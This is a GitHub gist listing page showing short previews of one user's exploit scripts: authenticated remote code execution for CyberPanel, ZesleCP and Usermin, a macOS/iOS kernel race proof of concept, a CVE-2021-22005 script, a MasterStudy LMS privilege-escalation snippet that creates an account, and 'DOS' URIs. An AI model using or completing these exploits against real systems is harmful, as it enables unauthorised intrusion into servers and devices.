numanturle’s gists

numanturle / elasticsearch.py

Created August 25, 2021 14:43

elasticsearch

	import json
	import sys
	from time import sleep
	from datetime import datetime
	from elasticsearch import Elasticsearch, helpers

	es = Elasticsearch("localhost:9200")

	def create_index(index):
	es.indices.create(index=index, ignore=400)

numanturle / cyberpanel.py

Created August 27, 2021 03:38

CyberPanel - Remote Code Execution (Authenticated) ( Version 2.1 )

	#!/usr/bin/python3
	# -- coding: utf-8 --
	# CyberPanel - Remote Code Execution (Authenticated) ( Version 2.1 )
	# author: twitter.com/numanturle
	# usage: cyberpanel.py [-h] -u HOST -l LOGIN -p PASSWORD [-f FILE]
	# cyberpanel.py: error: the following arguments are required: -u/--host, -l/--login, -p/--password


	import argparse,requests,warnings,json,re,base64,websocket,ssl,_thread,time
	from requests.packages.urllib3.exceptions import InsecureRequestWarning

numanturle / zeslecp.py

Created August 27, 2021 13:21

ZesleCP 3.1.9 - Remote Code Execution (RCE) (Authenticated)

	#!/usr/bin/python3
	# -- coding: utf-8 --
	# ZesleCP - Remote Code Execution (Authenticated) ( Version 3.1.9 )
	# author: twitter.com/numanturle
	# usage: zeslecp.py [-h] -u HOST -l LOGIN -p PASSWORD
	# https://www.youtube.com/watch?v=5lTDTEBVq-0


	import argparse,requests,warnings,json,random,string
	from requests.packages.urllib3.exceptions import InsecureRequestWarning

numanturle / usermin.py

Created August 27, 2021 15:57

Usermin - Remote Code Execution (Authenticated) ( Version 1.820 )

	#!/usr/bin/python3
	# -- coding: utf-8 --
	# Usermin - Remote Code Execution (Authenticated) ( Version 1.820 )
	# author: twitter.com/numanturle
	# usage: usermin.py [-h] -u HOST -l LOGIN -p PASSWORD
	# https://youtu.be/wiRIWFAhz24


	import argparse,requests,warnings,json,re
	from requests.packages.urllib3.exceptions import InsecureRequestWarning

numanturle / poc.c

Created September 16, 2021 08:44 — forked from infernalheaven/poc.c

macOS 11.5.2/iOS 14.7.1 Kernel Race Condition poc

	/*
	Written By Pan ZhenPeng(@peterpan980927) of Alibaba Security Pandora Lab
	use it on macOS: cc poc.c -o poc while True; do ./poc ; done
	*/

	#include <errno.h>
	#include <signal.h>
	#include <fcntl.h>
	#include <stdio.h>
	#include <stdlib.h>

numanturle / CVE-2021-22005.py

Created October 4, 2021 12:28 — forked from testanull/asdklajsdlkajsdlkajsdakjsdhalskdasdioasiodaklsd.py

	import requests
	import random
	import string
	import sys
	import time
	import requests
	import urllib3
	urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

	def id_generator(size=6, chars=string.ascii_lowercase + string.digits):

numanturle / hello.asm

Created December 12, 2021 21:05

	.data

	/* Data segment: define our message string and calculate its length. */
	msg:
	.ascii "Hello, ARM64!\n"
	len = . - msg

	.text

	/* Our application's entry point. */

numanturle / gist:c315257a6020395e2e47cc555d6f5202

Created January 15, 2022 13:33

DOS

	ms-cxh-full://
	ms-cxh:/

numanturle / Exploit.js

Created January 30, 2022 10:51

MasterStudy LMS – WordPress LMS Plugin 2.7.5 - Privilege Escalation (Unauthenticated)

	function randomInt(min, max) {
	return Math.floor(Math.random() * (max - min + 1)) + min;
	}

	jQuery(document).ready(function($){
	username = "poctesting"+randomInt(1,1337);
	password_poc = "S3cr3t"+randomInt(1,1337);
	nonce = stm_lms_nonces.stm_lms_register

	post_data = {

numanturle / gist:e1e85b9eaa73d7a427e355356d507bbb

Created February 24, 2022 09:30

numan numanturle